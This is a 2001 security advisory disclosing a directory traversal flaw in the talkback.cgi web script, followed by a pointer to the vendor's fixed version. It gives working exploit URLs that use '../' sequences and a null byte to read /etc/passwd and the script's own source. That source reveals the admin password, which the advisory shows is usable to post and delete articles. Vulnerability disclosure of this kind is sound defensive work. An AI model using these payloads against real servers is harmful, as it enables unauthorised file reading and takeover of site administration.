talkback.txt

`[whizkunde security advisory: talkback (CGI)]  
http://www.whizkunde.org | [email protected]  
  
----------------------------------------------------------  
Release date: April 9th 2001  
Subject: talkback.cgi security problem  
Systems affected: UNIX systems running talkback CGI script  
Vendor: http://www.waytotheweb.com  
----------------------------------------------------------  
  
1. problem  
Talkback.cgi may allow remote users (website visitors) to  
view any file on a webserver (depending on the user the  
webserver is running on).  
  
Regard this URL:  
  
http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=  
../../../../../../../../etc/passwd%00&action=view&matchview=1  
  
This will display the /etc/passwd (if the webserver user has  
access to this file).  
  
Another URL can display the source of talkback.cgi itself  
that contains the admin password:  
  
http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=  
../cgi-bin/talkback.cgi%00&action=view&matchview=1  
  
(You might have to use another URL instead of   
../cgi-bin/talkback.cgi%00, this depends on where the   
cgi-bin is installed)  
  
In this file you can find $admin_password that can be used in:  
  
http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?action=admin  
  
to post & delete articles.  
  
2. fix  
Way To The Web has released an updated version of  
talkback.cgi that isn't vulnerable to this problem:  
  
http://www.waytotheweb.com/webscripts/talkback.htm  
  
----------------------------------------------------------  
Stan a.k.a. ThePike  
[email protected]  
http://www.whizkunde.org  
  
Copyright whizkunde security team 2001`